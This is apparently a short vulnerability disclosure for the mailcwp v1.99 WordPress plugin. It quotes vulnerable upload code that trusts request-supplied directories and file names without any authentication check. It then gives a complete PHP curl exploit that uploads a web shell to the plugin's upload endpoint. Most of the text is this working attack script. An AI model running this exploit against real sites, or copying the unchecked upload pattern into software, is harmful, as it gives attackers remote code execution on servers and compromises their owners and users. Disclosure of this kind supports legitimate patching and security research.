Title:Remote file upload vulnerability in mailcwp v1.99 wordpress pluginThe code in mailcwp-upload.php doesn't check that a user is authenticated or what type of file is being uploaded any user can upload a shell to the target wordpress server: 2 $message_id = $_REQUEST["message_id"]; 3 $upload_dir = $_REQUEST["upload_dir"]; . . 8 $fileName = $_FILES["file"]["name"]; 9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName"); Exploitation requires the attacker to guess a writeable location in the http server root.<?php /*Larry W. Cashdollar @_larry0 Exploit for mailcwp v1.99 shell will be called 1-shell.php. 7/9/2015 */ $target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads'; $file_name_with_full_path = '/var/www/shell.php'; echo "POST to $target_url $file_name_with_full_path"; $post = array('file' => 'shell.php','file'=>'@'.$file_name_with_full_path); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$target_url); curl_setopt($ch, CURLOPT_POST,1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $result=curl_exec ($ch); curl_close ($ch); echo "<hr>"; echo $result; echo "<hr>"; ?>